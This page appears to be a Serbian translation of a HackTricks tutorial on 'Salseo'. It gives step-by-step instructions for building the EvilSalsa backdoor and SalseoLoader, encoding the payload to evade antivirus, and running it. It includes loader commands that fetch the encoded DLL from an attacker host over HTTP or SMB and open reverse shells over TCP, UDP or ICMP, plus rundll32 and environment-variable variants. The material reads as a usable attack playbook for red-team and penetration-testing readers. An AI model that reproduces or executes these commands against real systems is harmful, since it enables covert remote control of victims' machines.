7.8 KiB
Salseo
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Kompajliranje binarnih fajlova
Preuzmite izvorni kod sa github-a i kompajlirajte EvilSalsa i SalseoLoader. Trebaće vam instaliran Visual Studio za kompajliranje koda.
Kompajlirajte ove projekte za arhitekturu Windows sistema na kojem ćete ih koristiti (ako Windows podržava x64, kompajlirajte ih za tu arhitekturu).
Možete izabrati arhitekturu unutar Visual Studio-a u levom "Build" Tab-u u "Platform Target".
(**Ako ne možete pronaći ove opcije, kliknite na "Project Tab" a zatim na "<Project Name> Properties")
Zatim, izgradite oba projekta (Build -> Build Solution) (Unutar logova će se pojaviti putanja izvršnog fajla):
Priprema Backdoor-a
Prvo, moraćete da enkodujete EvilSalsa.dll. Za to možete koristiti python skriptu encrypterassembly.py ili možete kompajlirati projekat EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Sada imate sve što vam je potrebno da izvršite ceo Salseo postupak: enkodirani EvilDalsa.dll i binarni fajl SalseoLoader.
Otpremite binarni fajl SalseoLoader.exe na mašinu. Ne bi trebalo da budu otkriveni od strane bilo kog AV...
Izvršite backdoor
Dobijanje TCP reverznog shell-a (preuzimanje enkodiranog dll-a putem HTTP-a)
Zapamtite da pokrenete nc kao osluškivač reverznog shella i HTTP server kako biste poslužili enkodirani evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Dobijanje UDP obrnutog školjka (preuzimanje enkodiranog dll-a putem SMB-a)
Zapamtite da pokrenete nc kao osluškivač obrnutog školjka, i SMB server da posluži enkodirani evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Dobijanje ICMP reverse shell (enkodirani dll već unutar žrtve)
Ovog puta vam je potreban poseban alat na klijentu da primi reverse shell. Preuzmite: https://github.com/inquisb/icmpsh
Onemogućavanje ICMP odgovora:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Izvršite klijenta:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Unutar žrtve, izvršimo salseo stvar:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Kompajliranje SalseoLoader-a kao DLL izvođenjem glavne funkcije
Otvorite projekat SalseoLoader koristeći Visual Studio.
Dodajte pre glavne funkcije: [DllExport]
Instalirajte DllExport za ovaj projekat
Alati --> NuGet Package Manager --> Upravljanje NuGet paketima za rešenje...
Pretražite DllExport paket (koristeći karticu Browse), i pritisnite Instaliraj (i prihvatite iskačući prozor)
U vašem projekt folderu pojaviće se fajlovi: DllExport.bat i DllExport_Configure.bat
Deinstalirajte DllExport
Pritisnite Deinstaliraj (da, čudno je ali verujte mi, neophodno je)
Izađite iz Visual Studio-a i izvršite DllExport_configure
Jednostavno izađite iz Visual Studio-a
Zatim, idite u vaš SalseoLoader folder i izvršite DllExport_Configure.bat
Izaberite x64 (ako ćete ga koristiti unutar x64 okruženja, to je bio moj slučaj), izaberite System.Runtime.InteropServices (unutar Namespace for DllExport) i pritisnite Primeni
Otvorite projekat ponovo sa Visual Studio-om
[DllExport] više ne bi trebalo da bude označen kao greška
Izgradite rešenje
Izaberite Tip izlaza = Biblioteka klasa (Projekat --> SalseoLoader Properties --> Application --> Tip izlaza = Biblioteka klasa)
Izaberite x64 platformu (Projekat --> SalseoLoader Properties --> Build --> Ciljna platforma = x64)
Da biste izgradili rešenje: Build --> Izgradi rešenje (Unutar konzole za izlaz pojaviće se putanja nove DLL datoteke)
Testirajte generisanu Dll
Kopirajte i nalepite Dll gde želite da je testirate.
Izvršite:
rundll32.exe SalseoLoader.dll,main
Ako se ne pojavi greška, verovatno imate funkcionalnu DLL!!
Dobijanje shell-a korišćenjem DLL-a
Ne zaboravite da koristite HTTP server i postavite nc listener
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
Командна линија
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini da podržite HackTricks:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJEM!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.